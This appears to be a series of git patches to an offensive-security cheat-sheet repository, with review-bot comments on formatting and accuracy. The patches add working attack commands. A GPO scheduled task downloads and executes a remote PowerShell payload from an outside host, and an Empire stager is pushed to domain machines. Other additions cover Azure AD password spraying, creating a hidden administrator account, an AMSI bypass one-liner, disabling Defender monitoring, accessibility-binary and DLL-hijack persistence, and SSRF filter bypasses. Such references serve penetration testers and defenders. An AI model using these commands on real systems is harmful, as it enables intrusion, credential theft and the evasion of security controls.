diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 23db803..7b28ee9 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -10,7 +10,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Javascript keylogger](#javascript-keylogger) - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) -- [XSS in HTML/Applications](#xss-in-llapplications) +- [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in PostMessage](#xss-in-postmessage) From 3ed2b28e59899094038d24d0c528bd7eddced3bf Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 10 May 2020 23:16:29 +0200 Subject: [PATCH 53/85] Add user /Y + GPO Powerview --- .../Active Directory Attack.md | 17 ++++++++++++++++- .../Windows - Using credentials.md | 2 +- 2 files changed, 17 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b6539e7..12efdd6 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -406,6 +406,8 @@ Get-NetGPOGroup ### Exploit Group Policy Objects GPO +> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner + ```powershell # Build and configure SharpGPOAbuse git clone https://github.com/FSecureLABS/SharpGPOAbuse 
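Review bot: the blockquote stating that GPO creators are automatically granted Edit settings, delete and modify security (CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner) is an unattributed quotation; the reference-list hunk later in this patch adds harmj0y's "Abusing GPO Permissions" and RastaMouse's "GPO Abuse" posts, so cite whichever it is taken from directly under the quote.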
@@ -425,6 +427,16 @@ SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContent SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" ``` +Abuse GPO with PowerView + +```powershell +# Enumerate GPO +Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} + +# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO +New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force +``` + ### Dumping AD Domain Credentials 
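Review bot: the comment `# Enumerate GPO` understates what the pipeline does: `Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}` dumps the full ACL of every GPO, which is the data that exposes the rights named in the blockquote above (WriteProperty, WriteDacl, WriteOwner), so rename it `# Enumerate GPO ACLs`. The `-Enc AAAAAAA...` argument should be marked as a placeholder, e.g. `<base64-encoded-command>`, so nobody pastes it literally.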
@@ -1629,4 +1641,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) * [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) * [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) -* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) \ No newline at end of file +* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) +* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) +* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) +* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index b1148a3..eac15a9 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -25,7 +25,7 @@ ### TIP 1 - Create your credential ```powershell -net user hacker hacker1234* /add +net user hacker Hcker_12345678* /add /Y net localgroup administrators hacker /add net localgroup "Remote Desktop Users" hacker /add # RDP access net localgroup "Backup Operators" hacker /add # Full access to files From e95a4aeac0cab0c387fe99e1137fa4062fb4c1f7 Mon Sep 17 00:00:00 2001 
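Review bot: `net user hacker Hcker_12345678* /add /Y` gains a `/Y` with no comment, unlike the three lines below it. `/Y` auto-answers the confirmation prompt `net user` raises when a password is longer than 14 characters (the new one is 15), which is why the old 11-character `hacker1234*` never needed it; add a trailing `# /Y: skip the >14-char password prompt` so readers know what the switch does.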
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 11 May 2020 17:08:03 +0200 Subject: [PATCH 54/85] MSOL AD Spray --- .../Cloud - Azure Pentest.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 7a3c720..ec7384d 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -7,6 +7,7 @@ * [Azure Storage Account - Access](#azure-storage-account----access) * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) * [Azure AD - Enumeration](#azure-ad---enumeration) +* [Azure AD - Password Spray](#azure-ad---password-spray) * [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid) * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal) * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) 
@@ -286,6 +287,21 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online 3. Pick the account from the active sessions 4. Select Azure Active Directory and enjoy! +## Azure AD - Password Spray + +```powershell +git clone https://github.com/dafthack/MSOLSpray +Import-Module .\MSOLSpray.ps1 +Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 +Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! + +# UserList - UserList file filled with usernames one-per-line in the format "user@domain.com" +# Password - A single password that will be used to perform the password spray. +# OutFile - A file to output valid results to. +# Force - Forces the spray to continue and not stop when multiple account lockouts are detected. +# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. +``` + ## Azure AD - Convert GUID to SID The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. From a65fdbb568fe861b7e4dd4083cd96391a0d74562 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 12 May 2020 14:27:25 +0200 Subject: [PATCH 55/85] XSW 4 Fix #205 --- Methodology and Resources/Cloud - Azure Pentest.md | 3 ++- SAML Injection/README.md | 2 +- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index ec7384d..b84ac81 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md 
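Review bot: the two `Invoke-MSOLSpray` lines are the same invocation with different `-UserList` and `-Password` values; keep one and let the parameter comments (`UserList`, `Password`, `OutFile`, `Force`, `URL`) carry the rest. Since the `Force` comment says the tool stops when lockouts are detected, the block should state the tenant's default lockout policy up front so the reader understands why (a later patch in this series adds exactly that note above the fence).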
@@ -30,8 +30,9 @@ $ git clone https://github.com/hausec/PowerZure $ ipmo .\PowerZure $ Set-Subscription -Id [idgoeshere] + # Reader - $ Get-Runbook + $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails # Contributor $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" diff --git a/SAML Injection/README.md b/SAML Injection/README.md index e244bfd..2ba8dae 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -70,7 +70,7 @@ XML Signature Wrapping (XSW) attack, some implementations check for a valid sign - XSW1 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature. - XSW2 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature. - XSW3 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion. -- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion after the existing Assertion. +- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion within the existing Assertion. - XSW5 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message. - XSW6 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature. - XSW7 – Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion. From a5d220d5993a92fc897839b5ad4d6af466453087 Mon Sep 17 00:00:00 2001 From: John Date: Wed, 13 May 2020 12:19:36 -0400 Subject: [PATCH 56/85] Added SSRF bypass details --- Server Side Request Forgery/README.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) 
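Review bot: `$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails` is formatted as a single shell command but is really a list of cmdlet names; in PowerShell a comma-separated line like that evaluates to an array of bare words, not six calls. Present them as a comment (`# Reader: Get-Runbook, Get-AllUsers, ...`) or one cmdlet per `$` line, matching `$ Get-Runbook` that it replaces.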
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 8cc6592..da3fcfa 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -15,6 +15,7 @@ * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using rare address](#bypass-using-rare-address) + * [Bypass using URL encoding](#bypass-using-url-encoding) * [Bypass using bash variables](#bypass-using-bash-variables) * [Bypass using tricks combination](#bypass-using-tricks-combination) * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) @@ -76,7 +77,7 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit using a redirection +Advanced exploit [using a redirection](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) ```powershell 1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com @@ -177,6 +178,15 @@ http://127.1 http://127.0.1 ``` +### Bypass using URL encoding + +[Single or double encode a specific URL to bypass blacklist](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter) + +```powershell +http://127.0.0.1/%61dmin +http://127.0.0.1/%2561dmin +``` + ### Bypass using bash variables (curl only) From eb074393df4069eaf1d0429274f8510a17673a4b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 13 May 2020 23:07:39 +0200 Subject: [PATCH 57/85] Windows Persistence - Binary replacing --- .../Cloud - Azure Pentest.md | 15 ++++++++-- .../Windows - Persistence.md | 29 ++++++++++++++++++- 2 files changed, 41 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index b84ac81..f8c1857 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md 
+++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -177,6 +177,8 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest > By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph. +Check if the compagny is using Azure AD with `https://login.microsoftonline.com/getuserrealm.srf?login=username@target.onmicrosoft.com&xml=1`. + ```powershell $ git clone https://github.com/dirkjanm/ROADtools $ pip install roadrecon @@ -290,6 +292,8 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online ## Azure AD - Password Spray +> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds + ```powershell git clone https://github.com/dafthack/MSOLSpray Import-Module .\MSOLSpray.ps1 @@ -357,7 +361,11 @@ Prerequisite: * Compromise a server with Azure AD Connect service * Access to ADSyncAdmins or local Administrators groups -Use the script **azuread_decrypt_msol.ps1** from @xpn : https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545#file-azuread_decrypt_msol-ps1 to recover the decrypted password for the MSOL account +Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account: +* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545 +* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c + +Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack. ## Azure AD Connect - Seamless Single Sign On Silver Ticket 
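Review bot: `compagny` is a typo for `company` in the new sentence about the `getuserrealm.srf` check. The sentence also stops at the URL; say what in the XML response answers the question (the `NameSpaceType` value reports whether the domain is a managed or federated Azure AD tenant, or unknown), otherwise the reader has a request and no way to interpret it.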
@@ -455,6 +463,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an https://fws.domain.com/o365/visfed/intrdomain/se/?username=firstname.lastname%40domain.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx= ``` +* Validate email : https://github.com/LMGsec/o365creeper `o365creeper.py -f emails.txt -o validemails.txt` * Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon @@ -473,4 +482,6 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an * [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) * [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) * [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) -* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) \ No newline at end of file +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) +* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index bd4ca44..963d807 100644 --- a/Methodology and Resources/Windows - Persistence.md 
+++ b/Methodology and Resources/Windows - Persistence.md @@ -16,7 +16,12 @@ * [HKLM](#hklm) * [Services](#services) * [Scheduled Task](#scheduled-task) + * [Binary Replacement](#binary-replacement) + * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp) + * [Binary Replacement on Windows 10+](#binary-replacement-on-windows-10) * [RDP Backdoor](#rdp-backdoor) + * [utilman.exe](#utilman.exe) + * [sethc.exe](#sethc.exe) * [Skeleton Key](#skeleton-key) * [References](#references) @@ -157,6 +162,27 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` +### Binary Replacement + +#### Binary Replacement on Windows XP+ + +| Feature | Executable | +|---------------------|---------------------------------------| +| Sticky Keys | C:\Windows\System32\sethc.exe | +| Accessibility Menu | C:\Windows\System32\utilman.exe | +| On-Screen Keyboard | C:\Windows\System32\osk.exe | +| Magnifier | C:\Windows\System32\Magnify.exe | +| Narrator | C:\Windows\System32\Narrator.exe | +| Display Switcher | C:\Windows\System32\DisplaySwitch.exe | +| App Switcher | C:\Windows\System32\AtBroker.exe | + +#### Binary Replacement on Windows 10+ + +Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable. + +Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`. + + ### RDP Backdoor #### utilman.exe 
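Review bot: the TOC anchors `#utilman.exe` and `#sethc.exe` will not resolve: GitHub strips punctuation when slugging headings, so `#### utilman.exe` becomes `#utilmanexe` and `#### sethc.exe` becomes `#sethcexe`. The `#binary-replacement-on-windows-xp` and `#binary-replacement-on-windows-10` anchors are correct for the same reason (the `+` is dropped). In the `Binary Replacement on Windows 10+` subsection, state the precondition the cited write-up gives in its own title ("Exploiting Arbitrary File Writes with Accessibility Tools"): the `HID.dll` drop in `C:\Program Files\Common Files\microsoft shared\ink\` needs a prior arbitrary-file-write primitive, which is what a defender should monitor; as written, the two sentences read as if any user could write there.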
@@ -190,4 +216,5 @@ Enter-PSSession -ComputerName -Credential \Administr * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) * [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) -* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) \ No newline at end of file +* [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) +* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html) \ No newline at end of file From 7b8514f1f5cc128bc4f64f926e44ddec8d364e6f Mon Sep 17 00:00:00 2001 From: vict0ni <32034171+victoni@users.noreply.github.com> Date: Thu, 14 May 2020 00:09:30 +0200 Subject: [PATCH 58/85] Update README.md Added "adding magic bytes" solution --- Upload Insecure Files/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 6229f86..ed537da 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -65,6 +65,8 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm * `Content-Type : image/gif` * `Content-Type : image/png` * `Content-Type : image/jpeg` +- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) + Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. ### Picture upload with LFI 
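Review bot: the new `- [Magic Bytes](...)` item uses a `-` bullet while its siblings in the same list (`* `Content-Type : image/jpeg``) use `*`, and its explanatory sentence sits on an unindented line, so Markdown renders it as a separate paragraph rather than part of the item (the next patch in this series indents it). Switch the marker to `*` and keep the sentence indented under the item.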
@@ -95,4 +97,4 @@ Touch command * [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/) * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) -* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) \ No newline at end of file +* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) From e61db57ff107ff39d7500d1ff8b4f3370eaa5780 Mon Sep 17 00:00:00 2001 From: vict0ni <32034171+victoni@users.noreply.github.com> Date: Thu, 14 May 2020 00:10:12 +0200 Subject: [PATCH 59/85] Update README.md fixed indentation --- Upload Insecure Files/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index ed537da..1ffa55c 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -66,6 +66,7 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm * `Content-Type : image/png` * `Content-Type : image/jpeg` - [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) + Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. ### Picture upload with LFI From c1731041b5c9780c238197acf15dc66241f53947 Mon Sep 17 00:00:00 2001 
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 16 May 2020 13:22:55 +0200 Subject: [PATCH 60/85] Misc & Tricks Page + AMSI + Defender --- .../Cloud - Azure Pentest.md | 15 +++++- .../Miscellaneous - Tricks.md | 17 ++++++ .../Windows - Privilege Escalation.md | 52 ++++++++++++++++++- 3 files changed, 81 insertions(+), 3 deletions(-) create mode 100644 Methodology and Resources/Miscellaneous - Tricks.md diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index f8c1857..056261a 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -205,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report- ``` +Stormspotter, graphing Azure and Azure Active Directory objects + +```powershell +$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18 +git clone https://github.com/Azure/Stormspotter +cd Stormspotter +pipenv install . +stormspotter --cli +stormdash -dbu -dbp +Browse to http://127.0.0.1:8050 to interact with the graph. +``` + +Other interesting commands to enumerate Azure AD. ```powershell # Azure AD powershell module 
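Review bot: `Browse to http://127.0.0.1:8050 to interact with the graph.` is prose inside the Stormspotter code fence and will read as a command; move it below the fence. The block also mixes a `$ docker run` prompt with prompt-less lines, and `stormdash -dbu -dbp` lists two options with no values (the neo4j user and the `[password]` set in the docker line), so either give them placeholders (`-dbu neo4j -dbp [password]`) or drop the line. Make sure a blank line separates `Other interesting commands to enumerate Azure AD.` from the fence that follows it.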
@@ -470,7 +483,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an ## References * [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/) -* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) * [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) * [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) * [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md new file mode 100644 index 0000000..1794178 --- /dev/null +++ b/Methodology and Resources/Miscellaneous - Tricks.md @@ -0,0 +1,17 @@ +# Miscellaneous & Tricks + +All the tricks that couldn't be classified somewhere else. + +## Send a message to another user + +```powershell +# Windows +PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" +PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" + +# Linux +$ wall "Stop messing with the XXX service !" +$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root +$ who +$ write root pts/2 # press Ctrl+D after typing the message. +``` \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index f71519c..095b4ed 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md 
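Review bot: `13:00 PM` in the `wall -n` example mixes 24-hour and 12-hour notation; use `13:00` or `1:00 PM`. The `# "-n" only for root` comment should also say what `-n` does (it suppresses the wall banner), and the new file is committed without a trailing newline (`\ No newline at end of file`).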
@@ -6,7 +6,11 @@ * [Windows Version and Configuration](#windows-version-and-configuration) * [User Enumeration](#user-enumeration) * [Network Enumeration](#network-enumeration) -* [AppLocker Enumeration](#applocker-enumeration) +* [Antivirus & Detections](#antivirus--detections) + * [Windows Defender](#windows-defender) + * [AppLocker Enumeration](#applocker-enumeration) + * [Powershell](#powershell) + * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) * [Search for file contents](#search-for-file-contents) @@ -223,11 +227,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` -## AppLocker Enumeration +## Antivirus & Detections + +### Windows Defender + +```powershell +# check status of Defender +PS C:\> Get-MpComputerStatus + +# disable Real Time Monitoring +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +``` + +### AppLocker Enumeration - With the GPO - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script). +List AppLocker rules + +```powershell +PS C:\> $a = Get-ApplockerPolicy -effective +PS C:\> $a.rulecollections +``` + +### Powershell + +Default powershell locations in a Windows system. + +```powershell +C:\windows\syswow64\windowspowershell\v1.0\powershell +C:\Windows\System32\WindowsPowerShell\v1.0\powershell +``` + +Example of AMSI Bypass. + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Default Writeable Folders + +```powershell +C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys +C:\Windows\System32\spool\drivers\color +C:\Windows\Tasks +C:\windows\tracing +``` + ## EoP - Looting for passwords ### SAM and SYSTEM files 
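Review bot: `stormdash -dbu -dbp` in the Stormspotter block of `Cloud - Azure Pentest.md` is shown with two flags and no arguments, so the line cannot be copied as-is; give them placeholder values matching the `NEO4J_AUTH=neo4j/[password]` set on the `docker run` line. The last line of that block, `Browse to http://127.0.0.1:8050 to interact with the graph.`, is prose and belongs outside the fence, and `Other interesting commands to enumerate Azure AD.` needs a blank line before the following ```powershell fence to match the rest of the file.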
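Review bot: `13:00 PM` in the `wall -n` example of the new `Miscellaneous - Tricks.md` is contradictory (13:00 is already 24-hour time); use `13:00` or `1:00 PM`. The file is also committed without a trailing newline (`\ No newline at end of file`), and the fence is tagged `powershell` although the second half of the block is Linux shell.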
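Review bot: the Windows Defender block in `Windows - Privilege Escalation.md` gives `Set-MpPreference -DisableRealtimeMonitoring $true` with no note that it needs an elevated shell, nor that the change is visible afterwards (the `Get-MpComputerStatus` chained on the same line reports it); add a comment on both so the reader knows this is neither unprivileged nor silent. Also `Get-ApplockerPolicy -effective` should use the cmdlet's `-Effective` casing, `Default Writeable Folders` reads better as `Writable` (update the TOC anchor to match), and there is a double blank line before that heading.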
From cb8bf8ea668bd7d814e543693dae36cdab411a71 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 16 May 2020 22:58:11 +0200 Subject: [PATCH 61/85] add more refs --- Insecure Deserialization/PHP.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index a082110..3dfa63d 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -161,5 +161,7 @@ phpggc monolog/rce1 'phpinfo();' -s * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) -* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web) +* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/meepwn-2017-write-ups/#TSULOTT-Web) * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) +* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) +* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) From 4ca5e71c2fecfc8b556ecf9e35ab249a2ed878bd Mon Sep 17 00:00:00 2001 
